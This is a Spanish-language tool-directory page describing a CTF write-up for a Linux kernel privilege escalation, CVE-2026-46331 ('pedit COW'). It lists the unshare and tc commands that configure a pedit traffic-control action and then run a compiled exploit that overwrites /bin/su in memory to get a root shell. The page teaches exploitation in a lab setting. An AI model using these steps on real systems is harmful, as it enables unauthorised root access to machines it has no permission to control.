Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-46331-pedit-cow — Informe y pasos de explotación para la vulnerabilidad pedit COW (CVE-2026-46331) | Kitploit
Herramientas/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Escalada de PrivilegiosExplotaciónCTFAprendizaje y EducaciónExplotación de Binarios
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Informe y pasos de explotación para la vulnerabilidad pedit COW (CVE-2026-46331)

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
1hace 2 mesesAún no revisado
Compartir

CVE-2026-46331-pedit-cow

Informe y pasos de explotación para la vulnerabilidad pedit COW (CVE-2026-46331).

Resumen

Este desafío demuestra pedit COW, una falla del kernel de Linux en la acción de edición de paquetes del subsistema de control de tráfico (act_pedit). La vulnerabilidad permite a un usuario no privilegiado sobrescribir una copia en memoria de un binario setuid-root, obteniendo efectivamente una shell root sin tocar jamás el archivo en el disco.

Pasos de Explotación

1. Configuración Inicial

El entorno comienza como un usuario no privilegiado (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme
  1. Escalada de Privilegios (Creación de Namespace) Configurar el control de tráfico normalmente requiere privilegios CAP_NET_ADMIN, que un usuario normal no tiene. Usé namespaces de usuario no privilegiados para obtener esta capacidad.
root@kitploit:~
unshare -r -n
  1. Configuración de la Acción de Control de Tráfico Dentro del namespace, configuré el qdisc clsact y apliqué un filtro para desencadenar la acción pedit.

Limpie cualquier configuración existente si es necesario

root@kitploit:~
tc qdisc del dev lo clsact

Configurar el qdisc y el filtro

root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. Ejecutando el Exploit Después de configurar el entorno, salí de la shell root y ejecuté el exploit como usuario no privilegiado.
root@kitploit:~
exit
./packet_edit_meme
  1. Resultado Final El exploit sobrescribió con éxito la entrada de /bin/su, proporcionando una shell root interactiva.
root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

Descargar herramienta